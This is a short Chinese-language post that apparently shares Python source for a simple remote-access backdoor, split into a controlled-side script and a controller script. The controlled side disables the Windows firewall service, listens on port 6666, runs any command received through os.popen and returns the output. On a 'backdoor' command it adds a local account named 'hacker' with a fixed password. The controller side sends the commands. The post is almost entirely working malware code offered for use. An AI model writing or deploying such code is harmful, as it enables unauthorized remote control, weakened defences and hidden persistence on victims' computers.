没的废话,直接上代码!
被控制端:
import os import socket os.popen('net stop mpssvc') s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) host = 'USER-20180705UV' port = 6666 s.bind((host,port)) s.listen(5) while True: print('lodding...\n\n') c,addr = s.accept() while True: try: client_date = str(c.recv(1024),'utf8') if client_date == 'quit': c.close() break except Exception: break if client_date == 'bd': os.popen('net user hacker 123456 /ADD') re = 'BackDoor ADD Finish! ' + socket.gethostbyname(socket.gethostname()) c.send(bytes(re,'utf8')) else: r = os.popen(client_date).read() c.send(bytes(r,'utf8'))控制端:
import socket host = input('Host: ') port = 6666 hostport = (host,port) s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(hostport) def send(): user_input = input('> ').strip() if user_input == 'quit': s.close() exit(0) elif user_input == 'backdoor': s.send(bytes('bd','utf8')) else: s.send(bytes(user_input,'utf8')) def get(): server_reply = s.recv(1024) print('Server result:\n') print(str(server_reply, 'utf8')) while True: send() get()很简单,只能远程运行cmd命令,不过输入"backdoor"命令可以自动在Server上创建新用户。
